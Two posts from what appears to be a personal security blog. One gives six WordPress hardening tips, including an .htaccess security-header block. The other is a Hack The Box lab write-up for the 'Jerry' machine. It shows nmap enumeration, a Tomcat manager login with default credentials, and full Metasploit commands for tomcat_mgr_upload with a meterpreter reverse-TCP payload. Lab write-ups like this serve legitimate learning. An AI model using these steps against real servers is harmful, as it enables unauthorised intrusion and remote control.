A few easy tricks to improve the security of your WordPress website

In this blog post, I will show you six easy tricks to improve the security of your WordPress website.

Create a new administrator and delete the default one

Why?

Each new WordPress website has a default administrator. Now let’s assume that an attacker targets my website. They can easily find out that the content management system (CMS) for this website is WordPress by using a Chrome extension like Wappalyzer. Then they can find the WordPress default admin usernames with a Google search and enumerate users on my website thanks to a flaw on the WordPress login page.

By entering username=”test” and password=”test”, an attacker learns that “test” is not a valid username. This is an example of information disclosure that helps threat actors to enumerate the users on a webserver.
WordPress should change this message to the more generic “invalid username or password”.

Knowing the administrator username reduces the search space for dictionary attacks and brute force attacks. Now if the admin password is also common or weak, the attackers will take over the website in a matter of minutes.

How?

Add a new user with the role “administrator” and a strong password. I like my passwords to have at least 20 characters (a mixture of lowercase, uppercase, numbers, and special characters). Then log in with the new admin account, set up 2FA right away (see below), and delete the default admin user.

Add the recommended security headers

Why?

Security headers add an extra layer of protection on top of SSL.

  • HSTS: This header forces the browser to do all requests to the website domain over HTTPS.
  • X-Content-Type-Options: The browser is forced not to guess what kind of data is passed. If the extension is “.pdf”, the browser will expect a PDF file.
  • X-XSS-Protection: It will block the page in the browser from loading if reflected cross-site scripting (XSS) is detected.
  • Expect-CT: In order to prevent fraud, the SSL Certificate Authority has to log the certificates with the Certificate Transparency (CT) framework.
  • Referrer-Policy: A referrer header contains the address of the previous web page from which a link to the currently requested page was followed. The policy “no-referrer-when-downgrade” does not include the origin, path, and query string of the URL when the protocol security level is downgraded (HTTPS→HTTP).
  • Content-Security-Policy: This header is another method to force requests to the website domain over HTTPS.

How?

Open the .htaccess file on your server and add the following lines:

Add the following security headers to your .htaccess file.
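The lines themselves, written out here as an added example rather than taken from the post's screenshot: it assumes Apache with mod_headers enabled and a site that is already served entirely over HTTPS (HSTS locks browsers to HTTPS for the whole max-age period).

```apache
# Added example: the six security headers from this post, for Apache's .htaccess.
# Needs mod_headers; the <IfModule> guard avoids a 500 error if the module is missing.
# Verify after reloading with:  curl -sI https://example.com/   (your own domain)
<IfModule mod_headers.c>
    # HSTS: browsers use HTTPS for this host (and subdomains) for one year.
    # Only enable once every page and asset already works over HTTPS.
    Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains"

    # Stop the browser from MIME-sniffing a response away from its declared Content-Type.
    Header always set X-Content-Type-Options "nosniff"

    # Legacy reflected-XSS filter of older browsers; block the page when it triggers.
    # Modern browsers ignore this header, so it is a fallback, not a primary defence.
    Header always set X-XSS-Protection "1; mode=block"

    # Require the site certificate to be logged with Certificate Transparency.
    Header always set Expect-CT "max-age=86400, enforce"

    # Send the full referrer only when the security level is not downgraded (HTTPS -> HTTP).
    Header always set Referrer-Policy "no-referrer-when-downgrade"

    # CSP: make the browser fetch every http:// subresource over https:// instead.
    Header always set Content-Security-Policy "upgrade-insecure-requests"
</IfModule>
```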

Hide the PHP version from the HTTP Response Header

Why?

By default, the Apache server running my website exposes the PHP version in the HTTP response header. That is, it makes the PHP version that I use public on the Internet. This is particularly dangerous when the PHP version is an old and vulnerable one. An attacker could look for exploits against this specific version, and maybe get a reverse shell on the server.

The PHP version is visible in the HTTP response header.

How?

Open the php.ini file on your Apache server. Set the expose_php variable to Off. Restart php-fpm and Apache.

The PHP version is not visible anymore.

Enable auto-updates for WordPress, plugins, and themes

Why?

It is important to install the newest stable software releases as soon as they are available because they usually contain security patches. Enabling auto-updates takes this task off of your mind.

How?

  • WordPress: Go to Dashboard > Updates. Under “Current version”, click on “Enable auto-updates”.
  • Plugins: Go to Plugins > Installed Plugins. Under the column “Automatic updates”, enable auto-updates for every single plugin used. Delete inactive plugins.
  • Themes: Go to Appearance > Themes. Open the current theme and click on “Enable auto-updates”. Keep only one other theme as a backup. Delete all other inactive themes.

Use Two-Factor Authentication for every single user

Why?

This adds an extra layer of protection to the authentication process. If the password of a user is cracked or leaked accidentally, the attacker will not be able to authenticate on the website (at least not easily).

How?

Install and activate the WP 2FA plugin as the admin user. Force each user on the blog to add 2FA to their account without delay.

Make sure that only used server ports are open

Why?

Every open port on a server exposes a service that an attacker can reach over the network. If such a service is unpatched, an attacker who finds it with a port scan can easily take advantage of the system.

How?

Go to https://www.shodan.io/ and enter the IPv4 address of your server. Under “Ports”, you will see the open ports. If any port that you are not using is listed there, close it right away.

I hope you liked this post. If you have any questions, feel free to leave a comment in the comment section. Never stop learning!

HTB Jerry: Default credentials made this hack a piece of cake

In this blog post, I will explain how I hacked into the Jerry machine on Hack the Box. This hack was made easy by a combination of information disclosure, poor hygiene and use of default credentials.

In order to follow along you need a VIP subscription to Hack The Box (the monthly fee is 12 Euro at the moment), the HTB connection pack (download it from here) and Kali Linux (I’m using version 2020.3).

Create a Connection to the HTB Network

Refer to this post of mine.

Scanning and Enumeration

Open https://www.hackthebox.eu/home/machines and write down Jerry’s IPv4 address. Here we can also see that this is a Windows machine.

We first scan the target machine in order to identify open ports and services running behind those ports.

nmap -A -T4 -p- 10.10.10.95

The scan shows that port 8080 (HTTP) is open. Moreover, we learn that Apache Tomcat 7.0.88 is running on this server. This information will be useful later in this hack.

Open your browser and go to 10.10.10.95:8080. We see a default page, which is a sign of poor hygiene. Moreover, we also see a link to the manager webapp, which could help us get access to the server. Let’s click on the link.

The default page of Apache Tomcat/7.0.88 provides the link to the manager webapp.

We are asked for login credentials. We click on cancel and are redirected to 10.10.10.95:8080/manager/html. Here we get a 403 Access Denied. However, this page offers us a set of default credentials. As this website has poor hygiene, we will try to log in with them.

The “403 Access Denied” page provides a set of default credentials.

It worked, we are on the manager page. On this page, we learn that the OS is Windows Server 2012 R2 with amd64 architecture. Moreover, we see that we can upload a WAR file and deploy it. This looks juicy.

We are able to log in with those default credentials. We see that we can upload and deploy a WAR file from this page. Let’s see if we can exploit this!

Exploit Jerry

Open your browser and google “war file for tomcat 7.0.88 exploit”. After a bit of research, the multi/http/tomcat_mgr_upload exploit on Metasploit seems to be the best solution for our use case. We are going to use the default payload java/meterpreter/reverse_tcp (a staged payload) this time.

In msfconsole, select the module mentioned above and set its options (the rhosts, rport and credential values are the ones found during enumeration):

use exploit/multi/http/tomcat_mgr_upload
set rhosts 10.10.10.95
set lhost <Your IPv4 address>
set rport 8080
set HttpUsername tomcat
set HttpPassword s3cret
exploit

We get a shell and we have access to the Administrator folders and files.

Boom, we are in! Even if it doesn’t say NT AUTHORITY\SYSTEM, we have access to the Administrator account nevertheless! Now you just have to find the two flags. I leave this task as a challenge for you. Tip: they are both in the same folder this time.

I hope you liked this post. If you have any questions, feel free to leave a comment in the comment section. Never stop learning!